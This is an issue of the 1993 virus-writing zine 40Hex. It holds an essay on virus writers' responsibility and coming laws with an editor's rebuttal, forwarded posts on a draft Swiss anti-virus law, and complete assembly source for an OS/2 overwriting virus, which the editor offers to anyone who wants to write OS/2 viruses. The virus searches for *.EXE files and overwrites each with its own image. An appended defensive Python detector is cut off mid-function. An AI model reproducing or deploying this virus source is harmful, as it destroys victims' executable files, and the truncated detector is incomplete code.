40Hex Number 12 Volume 3 Issue 3                                      File 006

This article is being written for 40-hex, because I believe
communication is the key to helping computing obtain its maximum
potential. I do not agree with all of the philosophies of many virus
writers. This article does not endorse the views of anyone other than
myself :), and does not endorse any other material that will appear in
this or any other issue of 40-hex. Many of the ideas expressed in this
article appeared in one of my submissions to Computer Underground
Digest. I'm writing this because I've had some good honest conversations
with some of the Phalcon/Skism people, and I appreciate them listening
to my views (even though they don't agree with them all).

Again, I am not going to get into this "not all viruses are meant to be
destructive, not everyone who calls a virus exchange BBS will use
viruses for evil purposes, some anti-virus product developers lie to
scare the users" business. I agree with all of this, and if you don't,
then you will have to find that out for yourself. Virus writers already
know this is true. If you are not a virus writer, and really don't know
what is going on, and are reading this magazine thinking that we need
laws to shut these guys down, you should do some investigation on your
own and find out what is really going on in the virus arena. These
arguments only cloud the issues, and the issue here is "What is going
on?". I can't tell you everything that is going on because I don't know,
but I tell you this much: Something's happening here....What it is ain't
exactly clear...

Computer viruses are programs but they are also more than 'just
programs'. I did an in-depth study of virus exchange BBS and found that
the viruses themselves did not have a significant impact on the users. It
was more a case of certain attitudes having impact, and of the
(necessary) reaction on the part of security personnel and a-v product
developers having impact. By necessary action, I mean that each time a
virus writer releases a virus to a virus exchange BBS (losing control
over it) or releases its code in a magazine, people get scared.

Developers then have to put detection for that virus in their scanners.
Updates cost money. Some of this has changed since my study. More
viruses are being found in the wild. Some of this is due to their
intentional release, their availability on virus exchange BBS. Still,
the majority of the problem is not the distribution of the viruses but
the fostering of some of the attitudes. On the positive side, we see
some people finally calling for "responsible" action. Only time will
tell how long it lasts. To me, the P/S E-Mail virus site was a very bad
choice on the part of the administrators and I am glad it is gone.
Still, it was better than some situations which actively encourage using
viruses to cause damage. We don't yet live in that ideal world where we
can trust other people to act nice.

People want to say they can't help what someone else does with a virus
if they give it to them, but by exercising some common sense and
responsibility, they -can- help. It's not so much to ask considering the
future of cyberspace and its freedoms are at stake here. If people keep
going like they are now, soon we will have laws that say we CANNOT give
certain code to anyone. Don't believe it? Read on.

When I talked about laws in the Fido Virus echos, virus writers told me
there is NO way there will be any laws against virus exchange BBS,
anywhere, ever. Free Speech. WRONG. Do you think I just pull this stuff
out of thin air?

It's not illegal to have such BBS in America. Not yet. They are illegal
in other countries. Specifically, the Dutch law (art.350a (3), 350b (2)
Sr.) addresses the distribution of computer viruses. "Any person who
intentionally or unlawfully makes available or distributes any
information (data) which is meant to do damage by replicating itself in
an automated system shall be liable to a term of imprisonment not
exceeding four years or a fine of 100,000 guilders."

In Sweden, it's starting to sound more like this:

Anyone, who, without authorization  - erases, modifies, or destructs
electronically or similarly saved or data, or anyone who, creates,
promotes, offers, makes available, or circulates in any way means
destined for unauthorized deletion, modification, or destruction of such
data, will, if a complaint is filed, receive imprisonment for up to
three years, a fine, or if there is considerable damage, five years
sentence.

Is that clear enough? It is against the law in Holland to INTENTIONALLY
(i.e. on purpose, i.e. if you put it online, you knew you put it there)
to make available ANY data (program) that can do damage..specifically a
replicating program. That means virus. And don't forget that magic word,
"extradition". The Swiss laws are in draft stage.

Now, a lot of virus writers say they can't be held responsible for a
virus doing damage if they don't mean for it to escape, or if someone
else uses it. Wrong again. The law of negligence allows victims of
accidental injury to sue to obtain compensation for losses caused by
another's negligence. But, it's even more applicable if you consider the
aspect of torts. You can have what is called an intentional tort (which
is what lawyers use to refer to suits that try to get dollars for
damages, such as libel, fraud). In these kinds of cases, you may think
just because you didn't mean for your virus to 'escape' you are not
legally responsible (forgetting about ethics for a minute. A lot of
virus writers seem to think if it's not illegal to do xyz, xyz is
therefore ok to do. So let's put ethics aside and look at legalities).
You are indeed legally responsible because all that is necessary to
establish intentional torts is that you -intended- to do the act (write
the virus) that caused the harm. The law of negligence allows victims of
accidental injuries to sue for compensation due to negligence. This of
course refers to U.S. law, and is not in any way a complete reference,
but you can get the general idea. You don't just have free rein.

But, the law is not the solution, in my opinion. However, you can force
it to become the solution if you do not take responsibility for your
actions. If you keep making these viruses available indiscriminately, you
are creating LAWS, just as surely as if you had written the law with
your own hand.

Stop to think for a moment of the implications of this. The Dutch
enacted laws as the abuse of computerized equipment increased. While
some laws already existed that addressed computer crime, it became clear
that some intentional damage was being done that was slipping through
the loopholes in the law. Something must be going on that caused them to
react so strongly, to specifically include virus exchange bulletin
boards in this legislation. What was going on? Malicious damage.
Incitement. Actions that helped people to do damage. What is this
"incitement"?

Incitement. That is a term that is getting a lot of publicity now, with
Mike Elansky held on $500,000 bail for distributing a text file on his
BBS. The file contained the following text:


      ! Note to Law-enforcement type people: !
      ! This file is intended to promote     !
      ! general havoc and *ANARCHY*, and     !
      ! since your going to be the first     !
      ! assholes up against the wall.. there !
      ! isnt a damn thing you can do about   !
      ! it, pigs!                            !


It may be distasteful to some people, but the kind of information
included in the file was the same 'anarchy' type information you can get
at your local library. Does it merit a young man being locked up with an
almost impossible bail? It's no worse than a lot of the graffiti you
can find in Manhattan, or LA, and it's no worse than you can hear on a
lot of albums. To me personally, it's just silliness. I know the fellow
who wrote the file, and I don't find him to be a threatening anarchist.
He's a fine person, who wrote the above as a parody-spoof. It is not
much different than the things you hear in the halls at most high
schools these days. I'm not saying it's a desirable manner of
expressing dissatisfaction with the system, but it's *NOT* the devil
incarnate.

Someone had it on their BBS, someone downloaded it, and now, the BBS
sysop is in jail for it. Something's happening here...

Fear. People are afraid. They are chasing the shadowy ghost, and imagine
it is 'the virus writer' or 'the hacker'. Well, virus writers and
hackers may do some of these things, but the majority of them do not.
the publicity. Why? Because they want it. And, what happens when they
want it, and get it? More fear. The real ghost is ignorance and fear,
not the virus writer or hacker. On the other hand there ARE some very
malicious people out there. And, maybe to protect people from them, we
will need laws. The way it stands right now, no one knows who is
malicious and who is not because everyone is hiding behind the "law".
This will change, very soon, if people do not stop thinking they can
just do whatever they like because it's "legal". Laws are established
when new situations come about, and some people are pushing the envelope
here.

One thing that is happening is that people are afraid to say something
is wrong. We all have to stop being afraid to say something is WRONG. It
is WRONG to destroy or damage data of other people.

It's WRONG to encourage people to do it. And, if you can't figure out
what encourages people, then you had better figure it out soon, because
we don't have much time left.

I say you better figure it out fast because right now, people are up in
arms about computer viruses. They have every right in the world to
expect they shouldn't have to be on guard against any 'toys' that happen
to escape. They certainly deserve to be protected from people who
maliciously release, or -irresponsibly release- viruses. They should not
have to learn every in and out of DOS to protect themselves. For most
people, computers are work. They are not just hack-o-matik machines
waiting to be explored. No one has the right to destroy other people's
information. Just like we don't want the government or other people to
just do whatever they feel like with -our- information, we have to
respect other people's rights to -their- information.

It isn't working. There are still people who are doing malicious things
with viruses.  In talking with a lot of virus writers, I've pretty much
gotten the same story. After a while, it's just not fun to do it
anymore, and they evolve into learning more about code in general. They
no longer upload it to unsuspecting people. Most of them don't even use
virus exchange BBS, because there is just not any point. You can only
get excited over FF/FN so many times, and sooner or later you move on to
other things. But there is still a problem. Newcomers to the virus scene
pass thru the same stages; they release their viruses either through
incompetence or purposeful maliciousness, to 'prove' themselves. It's
almost like a rite of passage.

It is this group, the intentionally malicious, that are drawing all of
the attention. It is this group that forced the hand of the Dutch
government. It is this group, malicious virus writers and hackers that
are drawing the attention of the Legislators and Judiciary in the
United States, Canada, and now Switzerland.

Consider that we are living in a truly global society. The laws cannot
forever be bound by traditional territorial borders. Think of the
implications for the future. Being held hostage by one's freedoms tends
to make one rethink their "Rights". -------

-- 

SGordon@Dockmaster.ncsc.mil / vfr@netcom.com         bbs:    219-273-2431
fidonet 1:227/190 / virnet 9:10/0  p.o. box 11417    south bend, in 46624
  *if you don't expect too much from me then you might not be let down*
----

   I originally had a huge response for this, but I found that a
majority of my arguments were more aimed at the point of view she was
explaining, rather than her viewpoint.  The bottom line is, laws that
regulate information are horrible.  If it happens, it is unenforcible.
I do not believe that virus writers should be 'nice', or politically
correct, and I don't ever plan on removing virus source from 40Hex.
Another problem with her article is the part about virus writers doing
whatever they like just because it is 'legal'.  The point is, because
it IS legal, we can write viruses.  People also break the law and
distribute viruses.  It is NOT wrong to write a virus.  By any morality.
It is wrong to use it on someone else's computer illegally.  For the
most part I agree with Sara Gordon.  Before you go about saying she is a
narc, and she did this, and she did that, just ask yourself what have
you done about virus legislation.  If it is equal to zero, zilch, nada,
etc., then you should at least give her the credit of doing something to
help the underground, despite the rumors.  I don't care whether you
trust Sara Gordon, but realize that in this issue she is definitely
fighting the legislation.
40Hex Number 12 Volume 3 Issue 3                                      File 007

   This is the latest virus from our newest member Memory Lapse.  This
time, we aren't going to tell you what it does, so, enjoy it.  It is
called Nympho Mitosis 2.0.

->Gheap



40Hex Number 12 Volume 3 Issue 3                                      File 008

Article #1
----------

Subj:   Draft Swiss AntiVirus regulation

To whom it may concern:

The Swiss Federal Agency for Informatics (Bundesamt fuer Informatik, Bern) is
preparing a legislative act against distribution of malicious code, such
as viruses, via VxBBS etc. You may know that there have been several attempts
to regulate the development and distribution of malicious software, in UK, USA
and other countries, but so far, Virus Exchange BBS seem to survive even in
countries with regulations and (some) knowledgeable crime investigators.

In order to optimize the input into the Swiss legal discussion, I suggested
that their draft be internationally distributed,  for comments and suggestions
from technical and legal experts in this area. Mr. Claudio G. Frigerio from
Bern kindly translated the (Swiss) text into English (see appended text, both
in German and English); in case of any misunderstanding, the German text is the
legally relevant one! Any discussion on this forum is helpful; please send
your comments (Cc:) also to Mr. Claudio G. Frigerio (as he's not on this list).

"The Messenger" (Klaus Brunnstein: October 9, 1993)

###############################################################
Appendix 1:
Entwurf zu Art. 144 Abs. 2 des Schweizerischen Strafgesetzbuches

"Wer unbefugt elektronisch oder in vergleichbarer
Weise gespeicherte oder uebermittelte Daten loescht,
veraendert oder unbrauchbar macht, oder Mittel, die
zum unbefugten Loeschen, Aendern oder Unbrauchbarmachen
solcher Daten bestimmt sind, herstellt oder anpreist,
anbietet, zugaenglich macht oder sonstwie in Verkehr
bringt, wird, auf Antrag, mit der gleichen Strafe belegt."

P.S.: gleiche Strafe = Busse oder Gefaengnis bis zu 3 Jahren;
      bei grossem Schaden, bis zu 5 Jahren Gefaengnis sowie Verfolgung
      von Amtes wegen (Offizialdelikt)

###############################################################
Draft of article 144 paragraph 2 of the Swiss Penal Code
(English translation)

"Anyone, who, without authorization
   - erases, modifies, or destructs
     electronically or similarly saved or data,
or anyone who,
   - creates, promotes, offers, makes available, or circulates in
     any way
     means destined for unauthorized deletion, modification, or
     destruction of such data,
will, if a complaint is filed, receive the same punishment."

P.S.: same punishment = fine or imprisonment for a term of up to
      three years; in cases of a considerable damage, five years with
      prosecution ex officio
###############################################################
Author: Claudio G. Frigerio, Attorney-At-Law
Swiss Federal Office of Information Technology and System,
e-mail: bfi@ezinfo.vmsmail.ethz.ch
###############################################################

Article 2:
---------

Subj: More about Swiss Anti-Virus Laws

Thanks to everybody who replied on the subject of Swiss Anti-Virus
Legislation.

As somebody noticed there was a word missing in the English translation. It
should have been: "... destructs electronically or similarly saved or
TRANSMITTED data will..."

The text posted to the net, was a trial to include into the "data damaging"
even creation and dealing/circulating computer viruses. The idea behind this,
is that the virus itself already carries the malicious intent of his author.
Therefore it is dangerous in any circumstance. Actually a virus can not be
abused, as the idea of abuse includes the possibility, that a virus can be
used in a good way too. As I have been told by specialists, there is no such
"good use" of a virus as any unauthorized change of data has the potential of
interfering with other data and/or programs in environments, that the virus
author did/could not foresee. And even the unauthorized use of storage space
is a damage, as this space will not be available for authorized uses of the
computer system. Computer virus are an "absolute danger", and as any other
dangerous thing (like explosive, poison, radioactive materials or genetic
materials in specialized labs) computer virus should not be created or
circulated without restrictions.

It has been remarked that in the text there was no word about the requisite
intent or requisite knowledge of the committer. This way any BBS sysop would
always risk criminal charges, if his BBS carries any virus infected software
but the sysop isn't aware of it.

I apologize for not having told that Swiss Penal Law only considers
intentional crimes, if there is no explicit indication that negligent acts are
punished too. Therefore according to Swiss Penal Law terminology and system,
the text posted to the net only considers who "knowingly and willingly"
commits the act. That means that the author of the virus has to know it was
a virus, what he created: this is always the case. And who circulates the
virus has to know it was a virus and he wanted to circulate it. The
knowledge that SW was or carried a virus can be proved easily by the fact that
nobody knowingly stores viruses without labeling or marking them in any way,
in order not to be infected himself (yes, I know: if there really is somebody
so foolish, I have to find another way to prove his knowledge). For BBS a
"Virus Directory" containing viruses or virus source codes is evidence enough
for the "requisite knowledge and intent". The law does not want to punish
accidental distribution of viruses.

The phrase "means destined for unauthorized deletion" has been considered
unclear. "Means" certainly includes not only software, but source code (on
paper as on disks) too. It has been remarked that it's the classical
toolmaker problem: a knife can be used as woodcarver to make a great work, but
it might be used even as a thug to commit murder.
I realized this problem, but would you consider a knife as generally
destined to commit murder? Or would you consider explosive as generally
destined to create damage? We have to be aware that most items can be used
in a legal or abused in an illegal way. Seldom an item can only be used in
an illegal way, but computer viruses are such items! I do not speak about
software using virus specific reproduction techniques (like "killer viruses"
for copyright enforcement or "anti-viruses" supposed to fight viruses) that
make data changes with the explicit (contract/license) or implicit (highly
probable agreement of the user) authorization of the user. This kind of SW
is actually not included in the definition of "means destined for
unauthorized deletion, modification, or destruction of data".
Therefore you cannot say that Norton Utilities, WipeFile or any other
similar general purpose SW or utilities are "destined for unauthorized
deletion, modification or destruction", although they certainly could be
used for this.

The text doesn't say anything about malice, malicious intents or the intent
to damage, as these elements are very difficult to prove in trial, if the
accused denies any such intention. Actually I considered these subjective
elements as not really necessary, as the virus already carries the malicious
intent of its author: the malice of the author is proved by his virus, and
the malice of somebody circulating the virus is proved, if his knowledge,
that he was circulating a virus, is proved.

According to general principles of penal law the site of crime is the main
link to charge somebody. If a virus has been created or circulated outside
the national borders of Switzerland, Swiss Penal law cannot be applied. But
if a virus created outside Switzerland is transferred electronically to
Switzerland, the downloader will be held responsible, no matter if he was
in Switzerland or abroad, as "importing" as a way to circulate the virus.
The "success" of the act will take place in Switzerland. Anyway Art. 7 of
Swiss Penal Law follows the principle of territoriality and the
"Ubiquitaetsprinzip" (sorry: didn't find the correct English word: an act
is considered being committed not only where the committer was, when he
started his crime, but also where the "success" has been realized). Anyway
I do consider clarifying this by inserting that "importing" virus is
considered as "circulating in any way".

As this crime is prosecuted as soon as police or prosecution authority knows
about it (so called "ex officio"), there is no need for a specific complaint:
a detailed information about a fact is enough to start investigations, no
matter where the information came from (e.g. abroad).

There is no doubt, that professional anti-virus specialists and scientists
should have access to viruses and be allowed to even create viruses. As
long as this is covered by the aim of studying strategies to fight
computer viruses, this is OK. I actually planned a system of registering
these people with a federal authority (e.g. the IS Security Dptm. at the
Swiss Federal Office of Information Technology and Systems or the Ministry
of Justice). The posted text would then need to be completed as follows:
"Who, without being registered with the proper federal authority, creates...
Only trustworthy individuals, who are professionally or scientifically
active in combatting such means, may be registered on demand."

The Swiss legislator is actually not only considering "data damaging" but
"hacking", "time theft" and computer fraud too, but these ARE NOT subjects
of the discussion in this forum now. The same applies to software piracy,
already ruled by another law. I will gladly email/fax the German, French or
Italian text of the Penal Law draft to anybody interested. Please do not
ask me an English translation of these, as I am not a professional English
translator of legal text.

I am aware that the UK and Italy have/are going to have laws allowing to
prosecute the creation and circulation of computer viruses. If anybody
knows of other countries, may he please let me know in any way and as soon
as possible.

On Monday, 25 October 1993, there will be a meeting with the Ministry of
Justice in order to convince them to propose this to the Parliament. This
will be very very difficult, as there generally is very little knowledge
on, or concern for the threat through computer viruses. Most people have
simply never suffered an attack of computer viruses.

Thanks again for following this item with your comments.

Claudio G. Frigerio

P.S.: Please do not suggest to me to send them a floppy with a ..... just
to make them more aware of the risks...
P.P.S.: You can phone/email/fax/write to me in Italian, German, French,
Spanish or English.


Article #3
----------

Subj:   Detection complexity of some newish viruses. (PC)

A while back (January 93) a few people posted sizes of their algorithmic
virus detectors.  Here are the line counts for a couple more detectors
included (or to be included) in IBM AntiVirus.

These counts are for lines of C; the code is not particularly dense.
The SatanBug (*) count includes some tables.  (File I/O handling is
*not* included in these counts.  The lines-of-code counter is a standard
counter used in many IBM development projects.  I'm not completely sure
what rules this lines-of-code counter uses.  Some lines are
counted as both code and comment lines.)

SatanBug ::= 421 physical lines, 173 comment lines, and 187 code lines
Tremor ::= 165 physical lines, 36 comment lines, and 107 code lines

(*) There is some disagreement about the name of this virus.

Bill Arnold, barnold@watson.ibm.com (IBM AntiVirus Development)

Article 4:
----------

Subj:  Electronic Warfare

The October 18th issue of Aviation Week has an interesting item in its
Washington Outlook column on future developments in electronic warfare. 
Paraphrase follows:

  A Pentagon official, H. Steven Kimmel, deputy director of C3I testing
  and evaluation in the Pentagon acquisition office, said the next 
  developments in "non-lethal electronic combat" should be on methods
  of injecting deceptive information and computer viruses into enemy
  command, control, communication and intelligence systems and into 
  enemy communication nodes and data bases. Kimmel was speaking to the
  Association of Old Crows, a group of electronic warfare specialists.
  He further said that the U.S. needs this "nonlethal capability" both
  defensively and offensively. It was pointed out that American C3I
  systems are vulnerable because of their many nodes and reliance on
  computers and commercial off the shelf components.

Article 5:
----------

Subj:  Swiss Anti Virus Law

On November 11, 1993 the Law Committee of the 2nd Chamber of the Parliament 
(German: "Staenderat"; a kind of "Swiss Senate") decided to accept the anti-
virus propositions. The Staenderat will probably discuss in Parliament and 
decide on the subject by December 1993. In the Law Committee there was 
practically no opposition to the law draft; thus it is very likely that the 
Staenderat will accept it too. After this the "Nationalrat" (the 1st Chamber of 
Parliament, a kind of "Swiss House of Representatives" or "Swiss Congress")
will  discuss the draft and decide about it by Spring 1994.

The Swiss law draft, posted to the net, has been changed considerably in the
last few weeks. The draft actually discussed in Parliament will be:

German text:
Schweizerisches Strafgesetzbuch, Artikel 144bis, Datenbeschaedigung
1. Wer unbefugt elektronisch oder in vergleichbarer Weise
   gespeicherte oder uebermittelte Daten loescht, veraendert oder
   unbrauchbar macht, wird, auf Antrag, mit Gefaengnis oder mit Busse
   bestraft.
   Hat der Taeter einen grossen Schaden verursacht, so kann auf
   Zuchthaus bis zu fuenf Jahren erkannt werden. Die Tat wird von
   Amtes wegen verfolgt.
2. Wer Programme, von denen er weiss oder annehmen muss, dass sie
   zu den in Ziffer 1 genannten Zwecken verwendet werden sollen,
   herstellt, einfuehrt, in Verkehr bringt, anpreist, ueberlaesst oder
   sonstwie zugaenglich macht oder zu ihrer Herstellung Anleitung gibt,
   wird mit Gefaengnis oder mit Busse bestraft.
   Handelt der Taeter gewerbsmaessig, so kann auf Zuchthaus bis zu
   fuenf Jahren erkannt werden.

English text:
Swiss Criminal Code, Article 144bis, Damaging of data
1. Anyone, who without authorization deletes, modifies or renders 
   useless electronically or similarly saved or transmitted data, will, 
   if a complaint is filed, be punished with the imprisonment for a 
   term of up to 3 years or a fine of up to 40000 Swiss francs.
   If the person charged has caused a considerable damage, the
   imprisonment will be for a term of up to 5 years. The crime will
   be prosecuted ex officio.
2. Anyone, who creates, imports, distributes, promotes, offers, 
   makes available, circulates in any way, or gives instructions to 
   create programs, that he/she knows or has to presume to be used
   for purposes according to item 1 listed above, will be punished
   with the imprisonment for a term of up to 3 years or a fine of up
   to 40000 Swiss francs.
   If the person charged acted for gain, the imprisonment will be for
   a term of up to 5 years.

This English translation may not be perfect. The text will be available by
January 1994 in all official Swiss languages: German, French and Italian.

The protected item of this article are just data (immaterial goods). Any damage 
to computer systems, like the burning of floppies, plug-pulling, sledgehammers 
etc. are damages to "physical/material things" covered by article 144 
(Sachbeschaedigung, damage to property).

According to Swiss penal legislation the requisite knowledge and intent 
("knowingly and willingly") have not to be mentioned specifically.

As you may have noticed, the "registration" of IS security pros has been 
dropped. The expression "that he/she knows or has to presume to be used for 
purposes according to item 1 listed above" will exclude any penal
responsibility if the committer e.g. gave a virus to a professional anti-virus software 
developer or is creating viruses for research, as in these and similar special 
situations a misuse of the virus is highly unlikely. The committer will not be 
prosecuted, if he had reasonable motives, to practically exclude a misuse. On a 
retrospective analysis the judge will check if the person who gave a virus to 
somebody else (who misused it to cause damage) could in any way be blamed for 
not having foreseen the occurred misuse. If you give a virus to a notorious 
anti-virus professional, known for spreading viruses or source codes, or simply 
to somebody who does not give a special guarantee for not misusing the virus, 
you will be prosecuted. Who just trusted in the promise of a virus-recipient, 
that the latter will not misuse it, will be in trouble, if he did not have a 
very special additional reason to trust him. The law considers viruses as so 
dangerous for the general public, that any act making them available to
somebody else, represents a general risk to the general public. Who invokes an
exception, that an act of making a virus available to somebody else, did not 
represent such a risk has to prove it.

This may cause some concern, but law cannot foresee any situation. Judges will 
have to carefully check if the reasons to give a virus to somebody else, were 
good enough to practically exclude any misuse.

Making a newly discovered virus available to McAfee or the Virus Test Center 
will not be a crime, as long as the reputation of these recipients is above any 
suspicion.

As the draft is now in the Parliament, there is practically no way to change
anything in this text anymore (by the administration). Now it is up to the 
politicians to decide about the subject and to make any additional change.

40Hex Number 12 Volume 3 Issue 3                                      File 009

    This virus was given to us by Arthur Ellis, and is the first piece
of OS/2 virus source that I have ever seen.  Although it is only an
overwriting virus, it should definitely be helpful for anyone who wants
to write viruses in OS/2.

                                                ->GHeap

------------------------------------------------------------------
INCLUDE OS2.INC     ; if you don't have OS2.INC, see end of this file
COMMENT *
This simple overwriting virus demonstrates how the OS/2 API functions
are used to search for, open, and infect programs. No extended registers
are used, and the program may be assembled with MASM 5.1 or 6.0, TASM
for OS/2 (from the Borland C++ package), or with IBM Macro Assembler/2.
Link with :link386 /exepack virus,,,c:\os2\doscalls,virus.def
VIRUS.DEF:         NAME VIRUS WINDOWCOMPAT
                   PROTMODE
                   STACKSIZE 8192
There is minimal error checking (since when do viruses check errors?). A
useful project for a student would be to convert this program to .386p mode.
- Arthur Ellis, 1993
*
PrintIt     MACRO   string, StrLen
            push    1                       ; stdout handle
            push    DS
            mov     DX, OFFSET string       ; string to write
            push    DX
            xor     CX,CX                   ; zero CX
            mov     CL, [StrLen]            ; string length
            push    CX
            push    DS
            push    OFFSET Written          ; bytes written variable
            call    DosWrite                ; like int 21/40
            ENDM
OpenIt      MACRO   seg, handle, mode       ; SEGMENT, open mode, handle
            push    seg                     ; SEGMENT of file name
            push    BX                      ; OFFSET of file name
            push    DS                      ; SEGMENT of handle
            push    OFFSET handle           ; OFFSET of handle
            push    DS                      ; SEGMENT of open action
            push    OFFSET OpenAction       ; OFFSET of open action
            push    0                       ; file size DWORD
            push    0                       ; file size DWORD
            push    3                       ; attributes: hid,r-o,norm
            push    1                       ; FILE_OPEN
            push    mode                    ; OPEN_SHARE_DENYNONE
            push    0                       ; DWORD 0 (reserved)
            push    0                       ; DWORD 0 (reserved)
            Call    DosOpen                 ; like int 21/3D
            ENDM
.286p

STACK       SEGMENT PARA STACK 'STACK'
            DW    1000h
STACK       ENDS

DGROUP      GROUP   _DATA, STACK

            ASSUME  CS:_TEXT, DS:DGROUP, SS:DGROUP, ES:DGROUP

_DATA       SEGMENT WORD PUBLIC 'DATA'

FileSpec    DB      '*.EXE', 0
OpenErr     DB      ' ',13,10,27,'[m'
Hello       DB      27,'[2J',27,'[1;36mMy name is '
Infected    DB      ' --> infected'
CRLF        DB      13,10,27,'[m'
Written     DW      ?                       ; bytes written
MyHandle    DW      ?                       ; virus handle
VicHandle   DW      ?                       ; victim handle
OpenAction  DW      ?                       ; open result
Buf         FileFindBuf <>                  ; file find structure
MySize      DW      ?                       ; virus length
EnvSeg      DW      ?                       ; selector for environment
CmdOfs      DW      ?                       ; OFFSET of command line
Image       DB      2000 dup (?)            ; virus image
ImageLen    DW      ?                       ; length of virus
DirHandle   DW      -1                      ; directory handle
SrchCount   DW      1                       ; search count
_DATA       ENDS

_TEXT       SEGMENT WORD PUBLIC 'CODE'
            extrn DOSCLOSE:far, DOSEXIT:far, DOSWRITE:far, DOSGETENV:far
            extrn DOSFINDCLOSE:far, DOSFINDFIRST:far, DOSFINDNEXT:far
            extrn DOSOPEN:far, DOSREAD:far

main        PROC    far
start:      call    GetName                 ; get the virus filename
            OpenIt  ES, MyHandle, 40h       ; open virus for read
;--------------------------------------------------------------------
;---( Read virus to image buffer )-----------------------------------
;--------------------------------------------------------------------
            push    MyHandle                ; handle for this program
            push    DS                      ; buffer for file image
            push    OFFSET Image
            push    2000                    ; Could use DosQFileInfo to
                                            ;  get filesize but this works
            push    DS
            push    OFFSET ImageLen         ; virus length goes here
            call    DosRead                 ; like int 21/3F
;--------------------------------------------------------------------
;---( Find files to infect )-----------------------------------------
;--------------------------------------------------------------------
            call    FindIt                  ; find first file

found:      or      AX, AX                  ; error?
            jz      NoErr                   ; no error

quit:       push    1                       ; terminate all threads
            push    0                       ; return code
            call    DosExit                 ; like int 21/4C

NoErr:      cmp     word ptr SrchCount, 0   ; no files found?
            jz      quit                    ; none found

            PrintIt Buf.findbuf_achname,Buf.findbuf_cchName
                                            ; display filename found
;--------------------------------------------------------------------
;---( Write virus )--------------------------------------------------
;--------------------------------------------------------------------
            lea     BX,Buf.findbuf_achName  ; filename OFFSET in BX

            OpenIt  DS, VicHandle, 42       ; ACCESS_READWRITE|SHAREDENYNONE
            or      AX,AX                   ; error?
            jz      proceed
            PrintIt OpenErr, 25             ; error on open
            jmp     CloseIt

proceed:    PrintIt Infected,15             ; add to hit list
            mov     BX,[VicHandle]
            push    [VicHandle]             ; write to found file
            push    DS
            push    OFFSET Image            ; string to write
            push    [ImageLen]              ; image length
            push    DS
            push    OFFSET Written          ; bytes written variable
            call    DosWrite                ; write the virus

CloseIt:    push    [VicHandle]             ; prepare to close
            call    DosClose                ; close file
;--------------------------------------------------------------------
;---( Find next file )-----------------------------------------------
;--------------------------------------------------------------------
            push    DirHandle               ; Directory Handle
            push    DS                      ; SEGMENT of buffer
            push    OFFSET Buf              ; OFFSET of buffer
            push    SIZE Buf                ; length of buffer
            push    DS                      ; SEGMENT of count
            push    OFFSET SrchCount        ; OFFSET of count
            call    DosFindNext             ; Find next file
                                            ; like int 21/4F
            jmp     found                   ; infect if found else exit

main        ENDP
;--------------------------------------------------------------------
;---( Get virus file name from environment )-------------------------
;--------------------------------------------------------------------
GetName     PROC    near
            push    ds
            push    OFFSET EnvSeg
            push    ds
            push    OFFSET CmdOfs
            call    DosGetEnv               ; get seg, ofs of command line

            mov     ES,EnvSeg               ; ES:BX holds command line
            mov     BX,CmdOfs

            xor     DI,DI
            xor     AL,AL
            mov     CX,-1
            cld
scan:       repne   scasb                   ; scan for double null
            scasb
            jne     scan                    ; loop if single null
            mov     BX,DI                   ; program name address
            mov     CX,-1                   ; find length
            repne   scasb                   ; scan for null byte
            not     CX                      ; convert CX to length
            dec     CX
            mov     [MySize],CX             ; return length

            PrintIt Hello, 22

            push    1                       ; stdout handle
            push    ES                      ; segment for command line
            push    BX                      ; OFFSET of program name
            push    [MySize]                ; length of program name
            push    DS
            push    OFFSET Written          ; bytes written variable
            call    DosWrite                ; like int 21/40

            PrintIt CRLF,5
            ret
GetName     ENDP
;--------------------------------------------------------------------
;---( Find first victim )--------------------------------------------
;--------------------------------------------------------------------
FindIt      PROC    near
            push    DS
            push    OFFSET FileSpec
            push    SS                      ; SEGMENT of directory handle
            lea     AX, DirHandle           ; OFFSET of directory handle
            push    AX
            push    07h                     ; attribute
            push    DS                      ; SEGMENT of buffer
            push    OFFSET Buf              ; OFFSET of buffer
            push    SIZE Buf                ; length of buffer
            push    DS                      ; SEGMENT of search count
            lea     AX, SrchCount           ; OFFSET of search count
            push    AX
            push    0                       ; Reserved
            push    0
            call    DosFindFirst            ; Find first file
            ret                             ; like int 21/4E
FindIt      ENDP
;--------------------------------------------------------------------
_TEXT       ENDS
            END start
;--------------------------------------------------------------------
;--( FTIME structure from OS2.INC )----------------------------------
;--------------------------------------------------------------------
;FTIME   STRUC
;    ftime_fs    DW  ?
;FTIME   ENDS
;ftime_twosecs   EQU 01fh
;ftime_minutes   EQU 07e0h
;ftime_hours EQU 0f800h
;--------------------------------------------------------------------
;--( FDATE structure from OS2.INC )----------------------------------
;--------------------------------------------------------------------
;FDATE   STRUC
;    fdate_fs    DW  ?
;FDATE   ENDS
;fdate_day   EQU 01fh
;fdate_month EQU 01e0h
;fdate_year  EQU 0fe00h
;--------------------------------------------------------------------
;--( FileFindBuf structure from OS2.INC )----------------------------
;--------------------------------------------------------------------
;FILEFINDBUF STRUC
;findbuf_fdateCreation   DB  SIZE FDATE DUP (?)
;findbuf_ftimeCreation   DB  SIZE FTIME DUP (?)
;findbuf_fdateLastAccess DB  SIZE FDATE DUP (?)
;findbuf_ftimeLastAccess DB  SIZE FTIME DUP (?)
;findbuf_fdateLastWrite  DB  SIZE FDATE DUP (?)
;findbuf_ftimeLastWrite  DB  SIZE FTIME DUP (?)
;findbuf_cbFile  DD  ?
;findbuf_cbFileAlloc DD  ?
;findbuf_attrFile    DW  ?
;findbuf_cchName DB  ?
;findbuf_achName DB  256 DUP (?)
;FILEFINDBUF ENDS
;---------------------------------------------------------------------

---------------------------------------------------------------------
NAME VIRUS WINDOWCOMPAT
PROTMODE
STACKSIZE 8192

----------------------------------------------------------------------
masm /Zi %1;
link386 /exepack %1,,,c:\os2\doscalls,virus.def
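
----------------------------------------------------------------------
Added example (not part of the original 40Hex file or of Arthur Ellis's
source): because the listing above copies the same image of at most 2000
bytes over the start of every *.EXE it finds, overwritten files end up with
byte-identical heads, which a defender can detect by clustering executables
on a hash of their leading bytes. The function names, the 512-byte threshold
and the demo files are assumptions constructed for this illustration.

```python
import hashlib
import os
import tempfile
from collections import defaultdict

PREFIX_LEN = 512   # assumption: unrelated executables diverge well before this
READ_LEN = 2000    # the listing copies at most 2000 bytes of itself

def common_prefix_len(a, b):
    """Number of leading bytes that a and b share."""
    n = 0
    for x, y in zip(a, b):
        if x != y:
            break
        n += 1
    return n

def find_prefix_clusters(directory, ext=".exe", prefix_len=PREFIX_LEN):
    """Return [(file names, shared prefix length)] for files with identical heads."""
    groups = defaultdict(list)
    for name in sorted(os.listdir(directory)):
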